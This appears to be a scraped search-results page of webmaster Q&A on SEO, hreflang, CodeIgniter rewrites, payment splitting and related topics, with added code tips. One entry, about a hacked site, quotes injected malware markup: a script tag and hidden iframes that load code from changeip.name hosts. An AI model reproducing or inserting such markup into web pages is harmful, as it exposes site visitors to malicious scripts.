Search Results

Search found 14789 results on 592 pages for 'pro backup'.

  • What are some good services for brainstorming domain name ideas? [closed]

    - by Clay Nichols
    Possible Duplicate: Is there a domain search tool on the web that works well? I've run across a few of these but can't remember them right now (and I've probably missed a few good ones). The idea is that you provide some input (a word or words) and the service comes up with synonyms, rhyming words, etc. Ideally, I'd want some confidence that it isn't just registering all the domains I come up with.

  • Fix 403 errors in Google Webmaster Tools

    - by Justin
    Hi Team, I have a domain that has "fallen off a cliff" for searches in Google. Searches that used to rank in positions 1-4 are now gone from page 1. The same searches in Bing show the positions expected (top 5 results). In reviewing Google Webmaster Tools, I am seeing two problems: 1. The sitemap is reporting two errors: "General HTTP error: HTTP 403 error (Forbidden)" and "URLs not accessible". However, the URL they flag as "not accessible" is accessible; I can click the link Google provides and it works fine. 2. There are 6,000 crawl errors of type 403, and again, most of the pages reported as 403 are accessible in my browser (I tried various browsers as well). About half are from January, the other half from November. There are no IP-specific firewall rules on ports 80 and 443 that could block the Googlebot. Using the User Agent Switcher add-on for Firefox, I confirmed that the pages load when the user agent is the Googlebot. A search for just "site:thedomain.com" confirms there are over 9,000 pages in the index, but most searches don't return the site. I believe the 403 issues are the cause of the fall in search rankings, but I can't seem to find any information online with ideas about how to address this. Any ideas? jpe
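
    The asker already checked with a browser add-on; running the same check server-side, from a different IP than your workstation, helps separate user-agent blocking from IP-range blocking. A minimal PHP sketch, with a placeholder URL taken to stand in for one of the flagged pages:

      <?php
      // Fetch a flagged URL while presenting Googlebot's user-agent string.
      $ch = curl_init('http://thedomain.com/some-flagged-page'); // placeholder URL
      curl_setopt($ch, CURLOPT_USERAGENT,
          'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // capture instead of echoing
      curl_exec($ch);
      echo curl_getinfo($ch, CURLINFO_HTTP_CODE); // 200 expected; 403 confirms a block
      curl_close($ch);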

  • What Ranking Factors Are Used For International Search?

    - by Itai
    Google.com vs. Google.ca vs. Google.co.uk (etc.) all rank their results differently, the intention being to return more locally-relevant content. What factors, other than the ones below, are used to determine local relevancy? I already know the TLD (.com, .ca, etc.) and likely the server IP address are used, but there has to be more, as this would not explain some search results I noticed this week. In particular, I see a US-based site ranking #3 for some keywords on Google.com, ranking #5 on Google.ca, and not ranking within the first pages on Google.co.uk. On Google.com it outranks an Australian site, which outranks it on Google.ca. The site itself is relevant for all English-speaking locations, yet it is being outranked by sites from different regions on different Google TLDs (but not by ones from the same region as the TLD).

  • Solution for payment gateway with multiple sellers

    - by pvieira
    I'm looking for a payment gateway that can be used on a website with multiple sellers. Let's say that, depending on the purchased item, a given seller/merchant should receive the money. Would that be possible using only one "master merchant" account that would act as a "distributor" of funds for several "sub-merchants"? Does any well-established provider (PayPal, WorldPay, Auth.Net, etc.) support this?
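
    Several providers support this split-payment pattern; as one example (not necessarily the option available when this was asked), Stripe Connect's destination charges let a platform account collect the payment and route it to a connected seller account. A minimal sketch, assuming each seller has been onboarded as a connected account; the API key, amounts, and account ID are placeholders:

      <?php
      // Charge the buyer on the platform account, route funds to the seller,
      // and keep a platform fee ("master merchant" acting as distributor).
      require 'vendor/autoload.php';
      \Stripe\Stripe::setApiKey('sk_test_PLACEHOLDER');
      $intent = \Stripe\PaymentIntent::create([
          'amount'                 => 2000,   // total charge, in cents
          'currency'               => 'usd',
          'payment_method_types'   => ['card'],
          'application_fee_amount' => 200,    // platform's cut
          'transfer_data'          => ['destination' => 'acct_SELLER_PLACEHOLDER'],
      ]);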

  • Problem with homepage SEO when using subfolders on a multi-language website

    - by Antonio
    After reading hundreds of threads about multi-language websites I haven't found an answer to my specific problem, so I think it's not a common issue and I must have done something terribly wrong ;-) We have a brand.com website whose main language is DE, with the following subfolders: /de/ (canonical of / plus a redirect to /), /it/, and /en/. When I search google.com for EN keywords or google.it for IT keywords, I get the homepage in German (both title and description) as the top result, with no trace of the /it/ or /en/ homepages. Is this because /it/ and /en/ each need a separate link-building strategy? I've already configured Google Webmaster Tools the following way: brand.com, no language preference; brand.com/de/, de language; brand.com/it/, it language; brand.com/en/, en language. Perhaps having "/" as the DE main page is wrong and I should use a different approach, i.e. have "/" be a 301 to /de/ instead? Thanks in advance.
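
    The question doesn't mention hreflang annotations, which are the standard way to tell Google which URL to show for each language. A minimal sketch for this layout (URLs taken from the question, x-default pointing at the German root), with the same block placed on every variant of the homepage:

      <!-- Reciprocal hreflang set; the identical block goes on /, /it/ and /en/ -->
      <link rel="alternate" hreflang="de" href="http://brand.com/" />
      <link rel="alternate" hreflang="it" href="http://brand.com/it/" />
      <link rel="alternate" hreflang="en" href="http://brand.com/en/" />
      <link rel="alternate" hreflang="x-default" href="http://brand.com/" />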

  • How to Avoid Duplicate Content in a WordPress Ecommerce Store

    - by Bhanuprakash Moturu
    Hi, I run a WordPress eCommerce store powered by WooCommerce. I have a large inventory of products, and most of the product description is the same for all of them (it's mandatory to include it), so it creates a lot of duplicate content on the site. Each category has 6 products. I thought of two solutions; can you suggest which one is good? 1. noindex,follow the product pages and link them to the category page using a canonical tag. 2. index,nofollow the product pages and link them to the category page using a canonical tag. Which is the better solution, and is it good practice to use a canonical tag that points to the category page?
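
    For reference, a sketch of what option 1 would put in a product page's <head> (the category URL is a placeholder). Note that Google's guidance discourages combining noindex with a cross-page canonical, since the two send conflicting signals, so most sites pick one or the other:

      <!-- Option 1 on a product page: keep it out of the index but crawl its links -->
      <meta name="robots" content="noindex,follow" />
      <!-- Canonical pointing at the category page (placeholder URL) -->
      <link rel="canonical" href="http://example.com/product-category/widgets/" />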

  • Domain forwarding to a IE "trusted site" opens a blank page

    - by Michael Jasper
    My employer, a University, regularly hosts conferences and other events. While the websites for these events are hosted on our domain, organizers frequently request customized .com URLs, which we then forward to the specific site. Recently we discovered a problem where a page will not load if the following conditions are met (using a current example): the website is created on our CMS for a conference (http://continue.weber.edu/nulc); a domain is created (http://www.nulc2012.com) and forwarded to http://continue.weber.edu/nulc; the user enters http://www.nulc2012.com into their address bar using IE7 or IE8; and the user has *.weber.edu listed as a "trusted site" in IE security settings (the case for nearly all on-campus computers). When this happens, the browser correctly transfers to the page http://continue.weber.edu/nulc/index.php, but the page is blank, returning only: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META content="text/html; charset=windows-1252" http-equiv=Content-Type></HEAD> <BODY></BODY></HTML> Is there any known solution to this problem? Or am I missing something completely? Note: the tested websites do load correctly in Chrome, Firefox, and Safari.

  • My Flex 3 Website Doesn't Have Any Keywords Listed in Google's Webmaster Tools

    - by Laxmidi
    Hi, I've got a Flex 3 website. When I look in Google's Webmaster Tools under Your site on the web - Keywords, none are listed. Does anyone have an all-Flex site that has keywords listed there? The site's been up for about a month and has been indexed by Google. I have keyword meta tags on the site, which, from what I've read, Google ignores. Where does Google come up with the keywords for your site? Any suggestions on what I need to do? Thank you. -Laxmidi www.brainpinata.com

  • How to write good blog post tags

    - by keruilin
    It seems that you have three choices in deciding how you write tags for your blog posts: make them user-friendly, make them highly searchable, or a combo of the two. For example, let's say that I have a blog post with write-ups on the top 10 iPad apps for business travel (e.g., Evernote, Dragon Dictation, Instapaper, etc.). User-friendly tags: ipad apps, business travel. Searchable keywords (analyzed with Google Keyword Analyzer): ipad apps, ipad travel apps, evernote ipad, instapaper, instapaper ipad. Combo: ipad apps, ipad travel apps. So my question comes down to this: which is really the best choice -- 1, 2 or 3? Note: these visible post tags will also serve as the meta keywords for the post page.

  • How to get users to commit and collaborate to make a website valuable? [closed]

    - by AzizAG
    I own a website that requires a fairly large number of users to collaborate and contribute occasionally to make the website valuable; basically, the website can't be valuable without users helping me put content on it. To avoid confusion: I'm thinking of websites like Wikipedia, Stack Exchange and Yahoo! Answers, where most of the content is based on peer effort. How do they actually get users interested and committed in the first place? What are the things I have to do to get users involved in the website and actually help me grow it bigger?

  • Maximum file size for iFrame in IE7

    - by Peter Turner
    I've got a "super secure" javascript downloader* that I wrote, and it usually works alright. But I noticed, while trying to download a 90 meg file with it on a client's machine that on IE7, it's getting hung up about 1/3rd of the way through. I've never tried to send a file that large through the iFrame and it works fine in other browsers. Is there a size restriction on files that IE7 can read in an iFrame? * It's really just a PHP line that sets header("location: http://someplace/downloadbigthing.exe"); after it does some logging and verification.

  • .htaccess does not work without index.php on CodeIgniter

    - by Mattia
    I have read a lot of topics with the same problem but have not found the solution. I have a LAMP stack on an Ubuntu server. My document root is /home/utente/; inside this dir I have another dir (turni) with a CodeIgniter web app. The web app works fine with index.php in the URL, but I want to eliminate it. I have this configuration: config.php in CodeIgniter: $config['index_page'] = ''; .htaccess: RewriteEngine On RewriteBase / RewriteCond %{REQUEST_URI} ^system.* RewriteRule ^(.*)$ /index.php?/$1 [L] RewriteCond %{REQUEST_URI} ^application.* RewriteRule ^(.*)$ /index.php?/$1 [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ index.php?/$1 [L] /etc/apache2/sites-available/default: <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /home/utente <Directory /> Options FollowSymLinks AllowOverride None </Directory> <Directory /home/utente/> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny allow from all </Directory> ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin"> AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. LogLevel warn CustomLog ${APACHE_LOG_DIR}/access.log combined Alias /doc/ "/usr/share/doc/" <Directory "/usr/share/doc/"> Options Indexes MultiViews FollowSymLinks AllowOverride None Order deny,allow Deny from all Allow from 127.0.0.0/255.0.0.0 ::1/128 </Directory> When I open a link of the web app without index.php in the URL, the server shows me this error: The requested URL /turni/auth/login was not found on this server. Why? If I put index.php back, as in /turni/index.php/auth/login, everything works fine.
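
    The vhost above sets AllowOverride None for /home/utente/, which makes Apache ignore the .htaccess file entirely, and the .htaccess itself rewrites to /index.php at the document root even though the app lives in /turni/. A likely fix, sketched against the config in the question:

      # In /etc/apache2/sites-available/default: allow .htaccess to be read
      <Directory /home/utente/>
          Options Indexes FollowSymLinks MultiViews
          AllowOverride All
          Order allow,deny
          allow from all
      </Directory>

      # In /home/utente/turni/.htaccess: rewrite relative to the app's subdirectory
      RewriteEngine On
      RewriteBase /turni/
      RewriteCond %{REQUEST_FILENAME} !-f
      RewriteCond %{REQUEST_FILENAME} !-d
      RewriteRule ^(.*)$ index.php?/$1 [L]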

  • Building an SMS web application [closed]

    - by ramesh babu
    Possible Duplicate: How to add SMS text messaging functionality to my website? I would like to build a web application; the purpose of the web site is to send and receive SMS. I have researched a lot, but I didn't understand what the requirements are. Simply, I want an application similar to way2sms.com, and I don't want to buy SMS from a company; I would like to build my own infrastructure. I have the web design stuff covered. I would like to know the requirements to send and receive SMS and what infrastructure I need to do it.

  • Why not AJAX'ify entire websites?

    - by Anonymous -
    Is there any solid reasoning as to why sites shouldn't be developed with AJAX functionality that loads the major parts of each page (assuming there are elements like the header, navigation, etc. that remain the same)? Surely it would be less resource-intensive, since the server wouldn't have to serve content that appears on every page, benefiting both the host and the end user. Answer the question taking into consideration: the site's JavaScript behaviour degrades gracefully in every instance. For my question I'm talking about new sites where this behaviour could be implemented right from the start, so it doesn't technically cost any money -- we're not returning to a finished product to implement it.

  • Which is preferable: creating dedicated domains for mobile apps that share different content, or associating them with folders in one domain?

    - by Abdullah Al-Khalidi
    I want to consult you on an SEO matter with which I am completely lost. I've built a social mobile application that allows users to share text content, and I made all the content that appears in the application available on the web through dedicated links; however, those links cannot be navigated to through the website, but are generated when users share content through the app to social media networks. I've implemented this method on three applications with totally different content, and I've directed all generated URLs to come from the main company website, which is http://frootapps.com, so when a user shares something, the URL looks like http://frootapps.com/qareeb/share.aspx?data=127311. My question: which is preferable, a dedicated website for each app that uses such a method, or is it OK to keep doing it the same way I am doing it?

  • I'm using a shared server, and as such Gmail marks my email as spam (the From: headers differ but come from the same IP)

    - by chipperyman573
    I have a shared server, meaning many people share the same IP. When I send an email, my @website.com domain is different from that of someone else who shares the same IP with me, and therefore Gmail marks it as spam. For example: my website's IP is 1.2.3.4, and my website is mywebsite.com. Person 2's website is hosted by the same host, so their IP is also 1.2.3.4, and their website is person2.com. When they send an email, it gets sent from an @person2.com address; when I send an email, it gets sent from an @mywebsite.com address. According to Gmail's bulk sender guidelines: "Use the same address in the 'From:' header on every bulk mail you send." Again, the only similarity between our websites is the IP, yet this causes Gmail to mark both our mail as spam. Is there a way to sort this out with Gmail?
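
    Beyond Gmail's bulk-sender rules, the standard fix on shared IPs is to authenticate your own domain so Gmail stops judging the mail by the IP's other tenants. A minimal sketch of an SPF record for the domain from the question (the include: host is a placeholder for your host's own SPF record); setting up DKIM signing through your host helps for the same reason:

      ; DNS TXT record authorizing the shared IP to send mail for mywebsite.com
      mywebsite.com.  IN  TXT  "v=spf1 ip4:1.2.3.4 include:spf.yourhost.example ~all"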

  • How to remove this malware

    - by muratto12
    Some files on my site contain some extra lines. After I delete them manually, I find the files corrupted again some time later. It all comes from JS files on http://*.changeip.name/. How can I remove them? <!--pizda--><script type='text/javascript' src='http://m2.changeip.name/validate.js?ftpid=15035'></script><!--/pizda--> <iframe src=http://pizda.changeip.name/?f=1065433 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0> <iframe src=http://kuku.changeip.name/?f=1065433 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0>
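
    The ftpid= parameter in the injected script tag is characteristic of infections that reinfect via stolen FTP credentials, so change those (and scan the PC the credentials were used from) before cleaning, or the lines will keep coming back. A minimal PHP sketch (the docroot path is a placeholder) to locate every file carrying the injected marker:

      <?php
      // List every file under the docroot that contains the injected marker.
      $it = new RecursiveIteratorIterator(
          new RecursiveDirectoryIterator('/var/www/html')); // placeholder docroot
      foreach ($it as $file) {
          if ($file->isFile()
              && strpos(file_get_contents($file->getPathname()), 'changeip.name') !== false) {
              echo $file->getPathname() . PHP_EOL; // clean these, then rotate FTP passwords
          }
      }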

  • Point domain to 3rd Party DNS

    - by PhilCK
    I have a few domain names and a rather simple website (small-company type thing). We are in the process of having a web designer create a new website for us, but I don't want to give him access to the control panel for the domain names (and there seems to be no way to limit that access), while at the same time I don't want to be the go-between for all the settings. Is there a way, or a service, for me to point the domains at a 3rd-party DNS system that I can then give the web designer access to, without worrying that he can find my personal info or try to transfer my domain out? Thanks.

  • How can I host a website on a dynamically-assigned IP address?

    - by nick
    I recently upgraded my internet to the point that it is much faster and more reliable than my current web host. I would like to move my current domain to be hosted at home, but my IP address is dynamic. As far as I know, I only get a new IP when I restart my modem and/or router (which is almost never) or when Cable One (my ISP) pushes out a firmware update (rarely). There are a few ways I can see of doing this: 1. convince my ISP to give me a static IP; 2. assign my router my current IP to force a static IP (which might work?); 3. set my DNS record to my current IP address and update it on the rare occasions that it changes (see the sketch below). Obviously I'm hoping that the first one works, but I don't want to pay a lot of extra money (if that's what it takes) to get a static IP address. Which of these options will work most reliably?
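
    Option 3 is essentially what dynamic DNS services automate. A minimal sketch of a cron-run updater using the widely copied DynDNS-style update API (the provider host, domain, and credentials are placeholders; your DNS provider must offer such an endpoint):

      <?php
      // Re-point the DNS record at whatever our public IP currently is.
      $ip  = trim(file_get_contents('https://api.ipify.org')); // current public IP
      $url = 'https://dyndns.example.com/nic/update?hostname=mydomain.com&myip=' . $ip;
      $ctx = stream_context_create(['http' => [
          'header' => 'Authorization: Basic ' . base64_encode('user:password'),
      ]]);
      echo file_get_contents($url, false, $ctx); // typically "good <ip>" on success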

  • Streaming audio from a webpage

    - by luca590
    I want to be able to stream audio from another webpage through mine, but I do not know how to find the URL for each audio file located on the other webpage. It would also be extremely helpful to do everything in bulk: instead of writing a separate line of code for each audio file, simply write a few lines of code to load links to 100 audio files, etc. I am using Ruby on Rails for my webpage. How do you find a file located on a separate webpage? Does anyone know if it is possible, and how, to load file links in bulk?

  • How should I deal with user agent parsing in logs?

    - by Mr. Jefferson
    My web app project includes logging functionality so we can see where visitors are coming from (referrer URL), what the popular user agents are, what pages are most popular, etc. The log is stored in SQL Server, and when I query the user agents I use a large (almost 100 lines) and growing CASE statement to separate the user agents using string matching (i.e. if the user agent contains the string "Firefox/9" then it's Firefox 9). Is there a better way to do this, so I don't have to continually add to that CASE statement to deal with new browser releases? Also, how should I deal with less common, weird/unknown user agents? I've seen the following in the logs and been unable to find good information online about what they are: WordPress/3.3.1; http://www.facecolony.org Mozilla/4.0 ( http://www.hairirons.org redips; <a href=http://hairirons.org/>chi hair iron</a>) I'd guess they're bots/crawlers, but the sites they point to don't appear to reference web crawlers (or even be available sometimes). I've seen other user agents that aren't familiar to me, but I know they're bots because they include "bot" or "spider" or something similar.
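
    One alternative to a growing SQL CASE is to classify the user agent once, at logging or reporting time, against an ordered pattern table that lives in code. A minimal PHP sketch (the pattern list is illustrative, not exhaustive; order matters because the first match wins):

      <?php
      // Map a raw user-agent string to a readable family; first match wins,
      // so the generic bot pattern comes before the browser patterns.
      function classifyUserAgent($ua) {
          $patterns = [
              'Bot'     => '/bot|spider|crawl/i',
              'Firefox' => '/Firefox\/(\d+)/',
              'Chrome'  => '/Chrome\/(\d+)/',
              'IE'      => '/MSIE (\d+)/',
          ];
          foreach ($patterns as $family => $regex) {
              if (preg_match($regex, $ua, $m)) {
                  return isset($m[1]) ? "$family $m[1]" : $family; // e.g. "Firefox 9"
              }
          }
          return 'Unknown'; // review these periodically for new patterns
      }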

  • How long does it take for Google to re-index pages or update the link titles?

    - by ElHaix
    On one of our classified sites, when doing site:[mysite.com] in Google, the link text is simply [product name] - [mysite.com], whereas it should read [product name] classifieds for sale in... I suspect that the sitemap may have been submitted when we had just [product name], and the page titles were updated later. However, it has been a couple of weeks since I confirmed the longer page titles, and they still appear shortened in organic results. How can I get this looking right in Google's organic results?

  • How to save a PNG as a smaller file but with the same resolution?

    - by Radek
    Not sure which Stack Exchange site is best for this question. I have a scanned JPG file, 8.5 MB in size, with the properties below: pixel dimensions: 2468 × 3484 pixels; print size: 208.96 × 294.98 millimeters; resolution: 300 × 300 ppi. I need to save the file as a PNG while keeping the size under 4 MB. Most importantly, the size of the picture must remain the same; I mean that the size of the objects in the picture must stay the same. Could anybody tell me what is used to define the size of the objects in the picture?
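
    The printed object size is defined by pixel dimensions divided by resolution: 2468 px ÷ 300 ppi × 25.4 mm/in ≈ 208.96 mm, exactly the print size listed, so any conversion that keeps the pixel dimensions (and a 300 ppi setting in whatever tool prints it) keeps the object size. File size can then be cut by reducing colour depth; a minimal PHP/GD sketch (file names are placeholders; a scanned document usually survives a 256-colour palette well):

      <?php
      // Shrink the output PNG's byte size without touching its pixel dimensions.
      $im = imagecreatefromjpeg('scan.jpg');   // placeholder input (the 8.5 MB scan)
      imagetruecolortopalette($im, true, 256); // dithered 256-colour palette
      imagepng($im, 'scan.png', 9);            // 9 = maximum zlib compression
      imagedestroy($im);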

  • jQuery Mobile list view is not working after adding some jQuery code [closed]

    - by Kaidul Islam Sazal
    I am using jQuery Mobile, I have an array makeArray in jQuery, and I have created a few list views from the values of the array. Everything works fine, but the jQuery Mobile list-view style is not shown; rather, an ordinary list view is shown. This is my code: $(document).ready(function(){ var url = "inventory/inventory.json"; var makeArray = new Array(); $.getJSON(url, function(data){ $.each(data, function(index, item){ if(($.inArray(item.make, makeArray)) == -1){ makeArray.push(item.make); $('.upper_case') .append('<li data-icon="list-arrow"> <a href="trade_form.php?='+ item.make +'"><img src="images/car_logo/buick.png" class="ui-li-thumb"/>' + item.make + '</a></li>'); } }); }); });
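
    A likely cause, offered as an assumption since the question is closed: jQuery Mobile only enhances list items that exist when the page is initialized, so items appended inside the $.getJSON callback need a manual refresh. Continuing the code above, right after the $.each loop:

      // Re-apply jQuery Mobile's listview enhancement to the newly appended items
      $('.upper_case').listview('refresh');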

  • Lost Traffic from Google After Adding a Language Meta Tag

    - by Marian
    I have a site, aroundnails.com. It has an English version on the subdomain en.aroundnails.com. After reading about language-related meta tags for Google, I placed such a tag on the main page of the main site: <link rel="alternate" hreflang="en" href="http://en.aroundnails.com/" /> In this way I tried to tell Google that the site at en.aroundnails.com is the English version of the main site, not a duplicate. After a fortnight I lost a huge part of my traffic from Google, more than half. At the beginning of September I removed this meta tag, but traffic has remained at the same level. I hope somebody can help me solve this issue.
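
    For what it's worth, Google only trusts hreflang annotations when they are reciprocal and self-referencing: each version must list itself and every alternate. A sketch of the full set for this site (the main site's language code is a placeholder, since the question doesn't state it); the same block belongs on both homepages:

      <!-- On http://aroundnails.com/ and http://en.aroundnails.com/ alike -->
      <link rel="alternate" hreflang="xx" href="http://aroundnails.com/" /> <!-- xx = main site's language -->
      <link rel="alternate" hreflang="en" href="http://en.aroundnails.com/" />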
